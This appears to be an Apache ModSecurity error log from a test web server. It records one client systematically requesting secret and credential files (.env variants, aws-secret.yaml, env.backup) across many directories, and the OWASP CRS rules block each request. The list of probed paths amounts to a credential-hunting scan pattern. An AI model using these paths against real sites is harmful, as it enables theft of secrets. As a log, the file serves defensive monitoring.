[Sun Nov 23 04:53:26.725021 2025] [:error] [pid 266320] [client 45.148.10.143:57698] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aSKFNpI5j_0ed6X_RLk8ZAAAAAM"]
[Sun Nov 23 04:53:26.725360 2025] [:error] [pid 266320] [client 45.148.10.143:57698] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aSKFNpI5j_0ed6X_RLk8ZAAAAAM"]
[Sun Nov 23 04:53:26.725601 2025] [:error] [pid 266320] [client 45.148.10.143:57698] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aSKFNpI5j_0ed6X_RLk8ZAAAAAM"]
[Sun Nov 23 04:53:55.428657 2025] [:error] [pid 266319] [client 45.148.10.143:46320] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aSKFU95ex8tKkYIgrhsCFQAAAAI"]
[Sun Nov 23 04:53:55.428913 2025] [:error] [pid 266319] [client 45.148.10.143:46320] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aSKFU95ex8tKkYIgrhsCFQAAAAI"]
[Sun Nov 23 04:53:55.429109 2025] [:error] [pid 266319] [client 45.148.10.143:46320] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aSKFU95ex8tKkYIgrhsCFQAAAAI"]
[Sun Nov 23 04:54:19.684808 2025] [authz_core:error] [pid 266318] [client 45.148.10.143:47746] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml
[Sun Nov 23 04:54:19.994887 2025] [:error] [pid 266318] [client 45.148.10.143:47746] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aSKFazKJUjhaVaDyHaHyxQAAAAE"]
[Sun Nov 23 04:54:19.995235 2025] [:error] [pid 266318] [client 45.148.10.143:47746] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aSKFazKJUjhaVaDyHaHyxQAAAAE"]
[Sun Nov 23 04:54:19.995590 2025] [:error] [pid 266318] [client 45.148.10.143:47746] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aSKFazKJUjhaVaDyHaHyxQAAAAE"]
[Sun Nov 23 04:54:21.197205 2025] [:error] [pid 266320] [client 45.148.10.143:47756] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aSKFbZI5j_0ed6X_RLk8ZQAAAAM"]
[Sun Nov 23 04:54:21.197442 2025] [:error] [pid 266320] [client 45.148.10.143:47756] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aSKFbZI5j_0ed6X_RLk8ZQAAAAM"]
[Sun Nov 23 04:54:21.197628 2025] [:error] [pid 266320] [client 45.148.10.143:47756] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aSKFbZI5j_0ed6X_RLk8ZQAAAAM"]
[Sun Nov 23 04:54:41.059617 2025] [:error] [pid 267135] [client 45.148.10.143:45934] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSKFgYwvuenqv5uaxq8iLgAAAAk"]
[Sun Nov 23 04:54:41.059855 2025] [:error] [pid 267135] [client 45.148.10.143:45934] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSKFgYwvuenqv5uaxq8iLgAAAAk"]
[Sun Nov 23 04:54:41.060028 2025] [:error] [pid 267135] [client 45.148.10.143:45934] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSKFgYwvuenqv5uaxq8iLgAAAAk"]
[Sun Nov 23 04:54:45.194816 2025] [:error] [pid 266317] [client 45.148.10.143:36444] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSKFhc8Kqje0bNpeh30-JwAAAAA"]
[Sun Nov 23 04:54:45.195055 2025] [:error] [pid 266317] [client 45.148.10.143:36444] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSKFhc8Kqje0bNpeh30-JwAAAAA"]
[Sun Nov 23 04:54:45.195241 2025] [:error] [pid 266317] [client 45.148.10.143:36444] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSKFhc8Kqje0bNpeh30-JwAAAAA"]
[Sun Nov 23 04:54:45.816651 2025] [:error] [pid 266317] [client 45.148.10.143:36444] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aSKFhc8Kqje0bNpeh30-KAAAAAA"]
[Sun Nov 23 04:54:45.817332 2025] [:error] [pid 266317] [client 45.148.10.143:36444] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aSKFhc8Kqje0bNpeh30-KAAAAAA"]
[Sun Nov 23 04:54:45.817522 2025] [:error] [pid 266317] [client 45.148.10.143:36444] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aSKFhc8Kqje0bNpeh30-KAAAAAA"]
[Sun Nov 23 04:54:46.593532 2025] [:error] [pid 266317] [client 45.148.10.143:36444] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aSKFhs8Kqje0bNpeh30-KQAAAAA"]
[Sun Nov 23 04:54:46.593765 2025] [:error] [pid 266317] [client 45.148.10.143:36444] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aSKFhs8Kqje0bNpeh30-KQAAAAA"]
[Sun Nov 23 04:54:46.593952 2025] [:error] [pid 266317] [client 45.148.10.143:36444] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aSKFhs8Kqje0bNpeh30-KQAAAAA"]
[Sun Nov 23 04:54:53.176920 2025] [:error] [pid 266319] [client 45.148.10.143:43426] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aSKFjd5ex8tKkYIgrhsCFgAAAAI"]
[Sun Nov 23 04:54:53.177183 2025] [:error] [pid 266319] [client 45.148.10.143:43426] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aSKFjd5ex8tKkYIgrhsCFgAAAAI"]
[Sun Nov 23 04:54:53.177384 2025] [:error] [pid 266319] [client 45.148.10.143:43426] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aSKFjd5ex8tKkYIgrhsCFgAAAAI"]
[Sun Nov 23 04:54:54.117493 2025] [:error] [pid 266319] [client 45.148.10.143:43426] [client 45.148.10.143] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aSKFjt5ex8tKkYIgrhsCFwAAAAI"]
[Sun Nov 23 04:54:54.117807 2025] [:error] [pid 266319] [client 45.148.10.143:43426] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aSKFjt5ex8tKkYIgrhsCFwAAAAI"]
[Sun Nov 23 04:54:54.117996 2025] [:error] [pid 266319] [client 45.148.10.143:43426] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aSKFjt5ex8tKkYIgrhsCFwAAAAI"]
[Sun Nov 23 04:55:00.888492 2025] [:error] [pid 266321] [client 45.148.10.143:43428] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aSKFlPBIWxzSgQJzzRhB-wAAAAQ"]
[Sun Nov 23 04:55:00.888757 2025] [:error] [pid 266321] [client 45.148.10.143:43428] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aSKFlPBIWxzSgQJzzRhB-wAAAAQ"]
[Sun Nov 23 04:55:00.888986 2025] [:error] [pid 266321] [client 45.148.10.143:43428] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aSKFlPBIWxzSgQJzzRhB-wAAAAQ"]
[Sun Nov 23 04:55:02.003750 2025] [:error] [pid 266321] [client 45.148.10.143:43428] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aSKFlvBIWxzSgQJzzRhB_AAAAAQ"]
[Sun Nov 23 04:55:02.003981 2025] [:error] [pid 266321] [client 45.148.10.143:43428] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aSKFlvBIWxzSgQJzzRhB_AAAAAQ"]
[Sun Nov 23 04:55:02.004184 2025] [:error] [pid 266321] [client 45.148.10.143:43428] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aSKFlvBIWxzSgQJzzRhB_AAAAAQ"]
[Sun Nov 23 04:55:08.178941 2025] [:error] [pid 266318] [client 45.148.10.143:53962] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSKFnDKJUjhaVaDyHaHyxgAAAAE"]
[Sun Nov 23 04:55:08.179203 2025] [:error] [pid 266318] [client 45.148.10.143:53962] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSKFnDKJUjhaVaDyHaHyxgAAAAE"]
[Sun Nov 23 04:55:08.179385 2025] [:error] [pid 266318] [client 45.148.10.143:53962] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSKFnDKJUjhaVaDyHaHyxgAAAAE"]
